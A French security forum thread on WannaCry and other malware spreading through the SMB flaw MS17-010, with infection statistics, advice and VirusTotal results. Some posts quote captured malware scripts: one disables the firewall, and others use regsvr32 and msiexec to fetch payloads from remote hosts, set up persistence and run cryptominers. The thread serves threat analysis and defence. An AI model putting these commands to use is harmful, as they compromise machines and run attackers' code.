Ransomware WannaCry / Petya et attaques MS17-010 (SMB)

[Malekal_morte]

Le Crypto-Ransomware (rançongiciel chiffreur de fichiers) Wana Decryptor (aka WannaCry) est un nouveau ransomware qui commence à faire parler de lui de part sa forte distribution.
Wana Decryptor est le premier ransomware avec des capacités d'auto-propagation de type vers informatiques / Worm.

Wana Decrypt0r en vidéo :


Information sur Wana Decryptor

=> Voir la fiche du Ransomware Wana Decryptor

Le ransomware demande une rançon de $300 à $600, le paiement se faisant en Bitcoin.

Voici une capture d'écran de l'interface du Ransomware.

Wana-Decryptor-Ransomware.png

Wana-Decryptor .jpg

La distribution de Wana Decryptor

Ce dernier exploite notamment la vulnérabilité MS17-010 qui a été utilisé par la NSA.
Cette vulnérabilité vise le protocole SMB et donc les partages réseaux Windows.
Toutes les versions de Windows, de Vista à Windows 10 sont touchés, les versions serveur aussi :

Microsoft Windows Vista SP2
Windows Server 2008 SP2 y R2 SP1
Windows 7
Windows 8.1
Windows RT 8.1
Windows Server 2012 y R2
Windows 10
Windows Server 2016

Microsoft a publié un patch, milieu du mois de Mars, qui corrige cette vulnérabilité.

L'outil utilisé pour distribué Wana Decryptor et qui permet d'exploiter la vulnérabilité MS17-010 se nomme ETERNALBLUE.

Wannacry-ransomware-ETERNALBL-EK.png

Wana Decryptor (aka WannaCry) en action qui tente d'attaquer d'autres ordinateurs sur internet :



(src : https://twitter.com/kafeine/status/863049739583016960)

L'alerte de l'ANSSI :

Le CERT-FR recommande l’application immédiate des mises à jour de sécurité permettant de corriger les failles exploitées pour la propagation (MS17-010).
De manière préventive, s’il n’est pas possible de mettre à jour un serveur, il est recommandé de l’isoler, voire de l’éteindre le temps d’appliquer les mesures nécessaires.
En complément, le CERT-FR recommande la mise à jour des bases de signatures d’anti-virus.

(source : https://www.ssi.gouv.fr/actualite/alert ... ngiciel-2/)

La page suivante https://intel.malwaretech.com/botnet/wcrypt fournit une répartition des attaques et pays touchés par Wana Decryptor.

Wana-Decryptor-Ransomware-distribution.png

Avast! parle déjà de 36 000 détections : (source https://twitter.com/JakubKroustek/statu ... 7663490053)
puis Avast! parle de 50k détection puis 75k (source : https://blog.avast.com/ransomware-that- ... -far-today)

Wana-Decryptor-detections.png

Les pays les plus visés actuellement sont la Russie, l'Ukraine et Taiwan.
Un hôpital britannique a été déjà touché par ce ransomware.
Autre exemple d'un Aéroport à Francfort : (source : https://twitter.com/Avas_Marco/status/8 ... 5559889921)

Ransomware-WannaCry-Aeroport.jpg

Côté Kaspersky a enregistré 45 000 attaques visant 74 pays. (source : https://securelist.com/blog/incidents/7 ... the-world/)

wannacry_Kaspersky.png

wannacry_Kaspersky-2.png

EDIT - 1 jour après environ 250k ordinateurs infectés de part le monde

WannaCry-Wana-Decryptor-225k.png

L'estimation des revenus est de 3,5 bitcoins soit environ 6 000$ au bout de quelques heures et 30 000$ au bout d'une journée et demie.

wannacry-wana-decryptor-paiement-victime.png

EDIT - la majorité des victimes sont en Windows 7 :

WannaCry-Windows7.jpg

Beaucoup de campagnes pour pousser des trojan bitcoin par la suite, voir plus bas.
Le ransomware + ces trojans bitcoin, cela influe sur la valeur du bitcoin pour créer une bulle :

[Malekal_morte]

Une analyse chez Microsoft : https://blogs.technet.microsoft.com/mmp ... e-systems/
qui confirme le fait que le ransomware a des capacités d'auto-propagation et donc de vers informatiques.

[Malekal_morte]

Le domaine principal a été enregistré
Wana Decryptor vérifie l'existence de ce domaine, s'il est enregistré, le ransomware ne s'active pas "kill swtich".
Ainsi cela ralenti et limite la propagation de Wana Decrypt0r.

De nouveaux samples vont devoir être mis en ligne pour mener une nouvelle attaque.
Probablement que la nouvelle campagne utilisera plusieurs domaines différents de part le monde ou un Domain generation algorithm (DGA).

[Malekal_morte]

D'autre part menace ont pris le pas et utilisent cette même attaque, ainsi un trojan miner Adylkuzz est aussi installé sur les ordinateurs victimes.
Il s'agit d'un Trojan Miner, qui mine pour la crypto-monnaie Monero et non Bitcoin.

smb-attaque-adylkuzz-.png

Le malware se loge dans les fichiers suivants :
C:\Windows\Fonts\wuauser.exe --server
C:\Windows\Fonts\msiexev.exe

Plusieurs milliers de dollars auraient pu être déjà générés par cette attaque.
Il faut s'attendre à d'autres attaques provenant d'autres groupes, afin de faire de l'argent rapidement sur ces ordinateurs vulnérables, avant que le nombre de victimes diminuent.

source : https://www.proofpoint.com/us/threat-in ... ublepulsar

[yoz]

adylkuzz découvert par Kafeine :

http://www.zdnet.fr/actualites/faille-w ... 852564.htm

De plus Mak une question : WannaCry et adylkuzz sont-ils actifs si Marmiton est installé ou si WSH est désactivé ?

[Malekal_morte]

Si Windows est vulnérable et le partage accessible, oui ça va fonctionner.

~~

Un autre ransomware UIWIX utilise aussi la vulnérabilité MS17-010 pour infecter des ordinateurs.
UIWIX est l'extension de fichiers utilisés par ce ransomware.

uiwix-ransomware-1.jpg

source :
https://twitter.com/benkow_/status/863469162710040576
http://blog.trendmicro.com/trendlabs-se ... llow-suit/

[lukep]

D'accord, je viens de tout lire.
J'ai un doute sur le fait que l'ordinateur de ma femme puisse être infecté par ce truc là.
Concrètement, comment faire pour éradiquer ou même déjà détecter ?
Merci de vos lumières

[devadip]

D'accord, je viens de tout lire.
J'ai un doute sur le fait que l'ordinateur de ma femme puisse être infecté par ce truc là.
Concrètement, comment faire pour éradiquer ou même déjà détecter ?
Merci de vos lumières

slt
si t'es infecté par Wana Decryptor, tu dois avoir ce message sur l'écran de ton PC (pour adylkuzz, je ne sais pas)

[Malekal_morte]

ESET fournit un outil pour tester son ordinateur : https://help.eset.com/eset_tools/ESETEt ... hecker.exe
Lancer le programme sur votre ordinateur, vous aurez alors un message qui vous indique si l'ordinateur est vulnérable ou non.

ESETEternalBlueChecker-tester-vulnerabilite.png

[Malekal_morte]

Kaspersky a ajouté des stats sur les versions de Windows visées :


J'en profite pour donner cette vidéo qui joue ETERNALBLUE sur différentes versions de Windows :

[Malekal_morte]

Quelques autres Trojan ramassés sur la VM par SMB MS17-010 :

Un script C:\fuck.bat :

Code : Tout sélectionner

netsh advfirewall set allprofiles state off
net stop TeamViewer
sc config PolicyAgent start= auto
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net stop wk
net stop Microsoft.NET_Framework_NGEN
net stop VMwareATE
net stop WindowsATE
net stop Windows32_Update
net stop HelpSvcss
net stop "Help Service"
net stop WECS
net stop mssecsvc2.0
net stop system_update
net stop system_updatea
net stop Systemss
net stop nthost
net stop Servc
taskkill /im nthost /f
taskkill /im winhost /f
taskkill /im mscorsvw.exe /f
taskkill /im WUDFHost.exe /f
taskkill /im jlguaji.exe /f
taskkill /im NsCpuCNMiner32.exe /f
taskkill /im NsCpuCNMiner64.exe /f
taskkill /im spoolsvs.exe /f
taskkill /im taskhost.exe /f
taskkill /im NsCpuapl.exe /f
taskkill /im nheqminer_zcash.exe /f
taskkill /im nssm.exe /f
taskkill /im update.exe /f
taskkill /im Update64.exe /f
taskkill /im cssrsss /f
taskkill /im cssrssu /f
taskkill /im winhlp32.exe /f
taskkill /im server.exe /f
taskkill /im sppscv.exe /f
taskkill /im syatemm.exe /f
taskkill /im lsasss.exe /f
sc delete nthost
sc delete Servc
sc delete mssecsvc2.0
sc delete Systemss
sc delete WMIserver
sc delete WMIservers
sc delete WMI
sc delete Serv
sc delete system_update
sc delete system_updatea
sc delete VMwareATE
sc delete Windows32_Update
sc delete "Help Service"
sc delete HelpSvcss
sc delete WECS
echo y|cacls "C:\Windows\SysWOW64\cssrssu.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\sppsvc.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\mscorsvw.exe" /t /p everyone:n
echo y|cacls "C:\Windows\mscorsvw.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\sppsrv.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\svchost.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\conhost.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\alg.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\spoolsv.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\sqlservr.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\taskhost.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\notepad.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\systens.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\mscorsvw.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\system.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\explorer.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts\csrss.exe" /t /p everyone:n
echo y|cacls "C:\Windows\Fonts" /t /p everyone:r
echo y|cacls "C:\Windows\debug\wk" /t /p everyone:f
exit

fuck-bat.png

et Trojan.Zegost

Code : Tout sélectionner

SHA256:	e776ee3097a0b05887a8eb5313bbf217393c1fb6796446cb9166f1d10cbf4821
Nom du fichier :	sctpt.cc3
Ratio de détection :	52 / 59
Date d'analyse :	2017-05-20 17:26:45 UTC (il y a 0 minute) 
0 1
 Analyse
 File detail
 Informations supplémentaires
 Commentaires
 Votes
Antivirus	Résultat	Mise à jour
Ad-Aware	Trojan.Zegost.A	20170520
AegisLab	Troj.W32.MMM.ljJ5	20170520
AhnLab-V3	Win-Trojan/Zegost.Gen	20170520
ALYac	Trojan.Zegost.A	20170520
Antiy-AVL	Trojan[PSW]/Win32.Bjlog	20170520
Arcabit	Trojan.Zegost.A	20170520
Avast	Win32:Zegost-C [Trj]	20170520
AVG	PSW.OnlineGames_r.KC	20170520
Avira (no cloud)	TR/Crypt.XPACK.Gen3	20170520
AVware	TrojanPWS.Win32.Bjlog.wwn (v)	20170520
Baidu	Win32.Trojan.Redosdru.l	20170503
BitDefender	Trojan.Zegost.A	20170520
Bkav	W32.FaceSizeFileala.Worm	20170520
CAT-QuickHeal	Backdoor.Zegost.B	20170520
ClamAV	Win.Spyware.78381-2	20170520
CMC	Trojan-PSW.Win32.Bjlog!O	20170519
Comodo	TrojWare.Win32.PSW.Bjlog.WWN	20170520
Cyren	W32/Zegost.D.gen!Eldorado	20170520
DrWeb	Trojan.Siggen6.44651	20170520
Emsisoft	Trojan.Zegost.A (B)	20170520
Endgame	malicious (high confidence)	20170515
ESET-NOD32	Win32/Redosdru.ED	20170520
F-Prot	W32/Zegost.D.gen!Eldorado	20170520
F-Secure	Trojan.Zegost.A	20170520
Fortinet	W32/Bjlog.SMC!tr	20170520
GData	Trojan.Zegost.A	20170520
Ikarus	Trojan-PWS.Win32.Bjlog	20170520
Invincea	backdoor.win32.zegost.l	20170519
Jiangmin	Trojan/PSW.Bjlog.bni	20170520
K7AntiVirus	Password-Stealer ( 00275fc81 )	20170520
K7GW	Password-Stealer ( 00275fc81 )	20170520
Kaspersky	Trojan-PSW.Win32.Bjlog.wwn	20170520
Kingsoft	Win32.Malware.Heur_Generic.A.(kcloud)	20170520
Malwarebytes	Trojan.ServiceHijacker	20170520
McAfee	Generic.atg-IA!0E8D31E2E7FD	20170520
McAfee-GW-Edition	Generic.atg-IA!0E8D31E2E7FD	20170520
Microsoft	Backdoor:Win32/Zegost	20170520
eScan	Trojan.Zegost.A	20170520
NANO-Antivirus	Trojan.Win32.Bjlog.dnppq	20170519
Qihoo-360	Backdoor.Win32.BDX.K	20170520
SentinelOne (Static ML)	static engine - malicious	20170516
Sophos	Mal/Zegost-E	20170520
Symantec	Trojan Horse	20170519
Tencent	Backdoor.Win32.Bdx.a	20170520
TheHacker	Trojan/PSW.Bjlog.wwn	20170516
VBA32	TrojanPSW.Bjlog	20170519
VIPRE	TrojanPWS.Win32.Bjlog.wwn (v)	20170520
ViRobot	Trojan.Win32.PSWBjlog.20009549[h]	20170520
Webroot	W32.Backdoor.Gen	20170520
Yandex	Trojan.PWS.Bjlog!J3GTsn1dqr0	20170518
Zillya	Trojan.Bjlog.Win32.3373	20170520
ZoneAlarm by Check Point	Trojan-PSW.Win32.Bjlog.wwn	20170520

Trojan.Zegost.png

[Malekal_morte]

vu aussi passer, ceci :

Code : Tout sélectionner

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
sc config MpsSvc start= auto&net start MpsSvc
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y 
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
del c:\windows\debug\c.bat
exit

js.mykings.top est down :

Code : Tout sélectionner

[down]

http://23.27.127.254:8888/close.bat C:\windows\debug\c.bat 0

net1 start schedule&net1 user asps.xnet /del

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe

taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system"  /sc onstart /F

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f

echo 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe

rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

Tout ceci est lié à un RAT Chinois, très bien détaillé sur cette page : https://www.cyphort.com/eternalblue-exp ... s-trojans/

smb-MS17-010-rat-chinois.png

[Malekal_morte]

et un trojan bitcoin + Trojan.Win32.Farfli & Trojan.Win32.ServStart par SMB MS17-010 :

https://www.virustotal.com/fr/file/1490 ... 495322571/
https://www.virustotal.com/fr/file/eaec ... 495322573/

C:\WINDOWS\System32\svchost.exe -a cryptonight -o stratum+tcp://23.106.133.70:8888 -u 437j1SzjJp56GJY424YSvX6acUafYdfjvLr4hex9wQraYAznJ4VQnPsLV4qCvvhEmFWeqAP347yuZhuhoawANZtm6b29keq -p x -t 1

La détection du trojan crypto :

Code : Tout sélectionner

Votre fichier est en cours d'analyse.
SHA256:	eaec4435cdec12862255cbee9cb078c0ee6f9d64bf5290e6d511fb7ba511e386
Nom du fichier :	123.exe
Ratio de détection :	39 / 61
 Analyse
 File detail
 Informations supplémentaires
 Commentaires
 Votes
Antivirus	Résultat	Mise à jour
Ad-Aware	Gen:Variant.Zusy.209796	20170520
AhnLab-V3	Malware/Win32.Generic.C1594492	20170520
ALYac	Gen:Variant.Zusy.209796	20170520
Antiy-AVL	Trojan/Win32.AGeneric	20170520
Arcabit	Trojan.Zusy.D33384	20170520
Avast	Win32:Malware-gen	20170520
AVG	CoinMiner.IUB	20170520
AVware	Trojan.Win32.Generic!BT	20170520
Baidu	Win32.Trojan.WisdomEyes.16070401.9500.9986	20170503
BitDefender	Gen:Variant.Zusy.209796	20170520
Bkav	W32.QuisdorLTH.Trojan	20170520
CrowdStrike Falcon (ML)	malicious_confidence_100% (D)	20170130
Cyren	W32/Zusy.BC.gen!Eldorado	20170520
DrWeb	Trojan.KillProc.46747	20170520
Emsisoft	Gen:Variant.Zusy.209796 (B)	20170520
Endgame	malicious (high confidence)	20170515
ESET-NOD32	a variant of Win32/CoinMiner.ACF	20170520
F-Prot	W32/Zusy.BC.gen!Eldorado	20170520
F-Secure	Gen:Variant.Zusy.209796	20170520
Fortinet	W32/Generic.AC.39B191!tr	20170520
Ikarus	PUA.BitCoinMiner	20170520
Invincea	generic.a	20170519
Jiangmin	Trojan.Generic.ajzhc	20170520
K7AntiVirus	Unwanted-Program ( 004b8d881 )	20170520
K7GW	Unwanted-Program ( 004b8d881 )	20170520
Kaspersky	HEUR:Trojan.Win32.Generic	20170520
Malwarebytes	Trojan.BitCoinMiner	20170520
McAfee	GenericRXBI-EN!334DAAD78B0F	20170520
McAfee-GW-Edition	BehavesLike.Win32.MultiPlug.bc	20170520
Microsoft	Trojan:Win32/CoinMiner	20170520
eScan	Gen:Variant.Zusy.209796	20170520
NANO-Antivirus	Trojan.Win32.KillProc.egzyti	20170521
Panda	Trj/Genetic.gen	20170520
Rising	Malware.Heuristic!ET (cloud:U2PdTVSMd6L)	20170518
SentinelOne (Static ML)	static engine - malicious	20170516
TheHacker	Trojan/CoinMiner.acf	20170520
VIPRE	Trojan.Win32.Generic!BT	20170520
Webroot	W32.Malware.Gen	20170521
ZoneAlarm by Check Point	HEUR:Trojan.Win32.Generic	20170520

Trojan-Crypto-SMB.png

Trojan-Crypto-SMB-3.png

Trojan-Crypto-SMB-2.png

Il arrete le service du spread Wannacry

Trojan-Crypto-SMB-4.png

Trojan.Win32.ServStart- & Trojan Crypto par SMB

Trojan.Win32.ServStart-SMB-MS17-010.png

Code : Tout sélectionner

SHA256:	f9790fbbaba1ea09d999ac721663a43a3d62e264a0c7ac1b289ceca5153e3960
Nom du fichier :	svchost.exe
Ratio de détection :	22 / 60
Date d'analyse :	2017-05-20 23:27:59 UTC (il y a 0 minute) 

AegisLab	Troj.W32.Gen.lLnX	20170520
Avast	Win32:Malware-gen	20170520
Baidu	Win32.Trojan-Downloader.Agent.cw	20170503
CrowdStrike Falcon (ML)	malicious_confidence_90% (W)	20170130
DrWeb	Trojan.Siggen7.22009	20170520
Endgame	malicious (moderate confidence)	20170515
ESET-NOD32	a variant of Generik.MBLOGMY	20170520
GData	Win32.Trojan.Agent.6F9J5F	20170520
K7AntiVirus	Riskware ( 0040eff71 )	20170520
K7GW	Riskware ( 0040eff71 )	20170520
Kaspersky	Trojan.Win32.ServStart.abdy	20170520
McAfee	Trojan-FJYJ!CE253C24345B	20170520
McAfee-GW-Edition	Trojan-FJYJ!CE253C24345B	20170520
Microsoft	TrojanDownloader:Win32/Small	20170520
Palo Alto Networks (Known Signatures)	generic.ml	20170521
Panda	Trj/GdSda.A	20170520
Qihoo-360	Win32/Trojan.8b6	20170521
Symantec	Trojan.Gen	20170520
Tencent	Win32.Trojan.Servstart.Szld	20170521
TrendMicro	BKDR_ZEGOST.SM32	20170520
Webroot	W32.Infostealer.Zeus	20170521
ZoneAlarm by Check Point	Trojan.Win32.ServStart.abdy	20170520

Trojan.Win32.Farfli

Trojan.Win32.Farfli.png

[Malekal_morte]

Autre Trojan.Bitcoin :
hxxp://219.250.59.5:5687/55.exe

"conhoste.exe" -o stratum+tcp://pool.minexmr.com:7777 -u 42CJ2GCuUSaJ7uWwHsJ3G8gutAJPp7wet34bBqktPuMHg2DurgXLtfmaLpCfJKEtqU3BFqBr1yz3fVJdqNstFGPkUGWXRjG -p x -t 0 -nofee 1 -dbg -1

Tous les binaires sont dans C:\Windows\fonts

30 / 61 : https://www.virustotal.com/fr/file/fcf8 ... 495358618/
47 / 61 : https://www.virustotal.com/fr/file/c1fe ... 495372085/
15 / 59 : https://www.virustotal.com/fr/file/550c ... 495372091/

Trojan-Bitcoin-MS17-010.png

Trojan-Bitcoin-MS17-010-2.png

6700 hits environ en une journée, le fichier 55.exe semble être mis à jour tous les jours.

Trojan-Bitcoin-MS17-010-4.png

[Malekal_morte]

W32/Parite toujours par SMB MS17-010 :

https://www.virustotal.com/fr/file/0e96 ... 495384136/
https://www.virustotal.com/fr/file/7ef7 ... /analysis/
https://www.virustotal.com/fr/file/f028 ... /analysis/
https://www.virustotal.com/fr/file/ffac ... 495384398/

Win32.Parite.png

Win32.Parite-2.png

Win32.Parite-3.png